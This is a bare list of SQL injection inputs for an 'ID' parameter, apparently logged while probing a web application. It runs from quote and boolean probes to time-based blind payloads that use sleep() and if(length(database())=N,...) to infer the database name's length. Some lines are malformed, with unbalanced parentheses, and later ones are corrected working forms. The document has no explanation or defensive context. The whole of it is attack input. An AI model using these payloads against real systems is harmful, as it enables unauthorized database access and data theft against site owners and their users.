ID:1
ID:1"
ID:1'
ID:1' and 1=1
ID:1)
ID:1"
ID:1'
ID:1 and sleep(3) -- 
ID:1" and sleep(3) -- 
ID:1' and sleep(3) -- 
ID:1 and sleep(3) -- 
ID:1' and sleep(3) -- 
ID:1' and if (length(database()=8,sleep(3))
ID:1' and if (length(database()=8,1,sleep(3))
ID:1' and if (length(database()=8,1,sleep(3)) -- 
ID:1' and if (length(database())=8,1,sleep(3)) -- 
ID:1' and if ((length(database())=8,1,sleep(3)) -- 
ID:1' and if (length(database())=8,1,sleep(5))
ID:1' and if(length(database())=8,1,sleep(5))
ID:1' and sleep(1)
ID:1' and sleep(5)
ID:1' and sleep(3) -- 
ID:1' and if (length(database()),1,sleep(5)) -- 
ID:1' and if (length(database())=8,1,sleep(5)) -- 
ID:1' and if(length(database())=8,1,sleep(5)) -- 
ID:1' and sleep(5)
ID:1' and sleep(5) -- 
ID:1' and length(database())=1 -- 
ID:1' and length(database())=1 and sleep(3) -- 
ID:1'  -- 
ID:1'   and sleep(6)-- 
ID:1' and if(length(database())=8,sleep(5))-- 
ID:1' and if(length(database())=8,1,sleep(5))-- 
ID:1' and if(length(database())=3,1,sleep(5))-- 
ID:1' and if(length(database())=3,sleep(5),1)-- 
ID:1' and if(length(database())=8,sleep(5),1)-- 
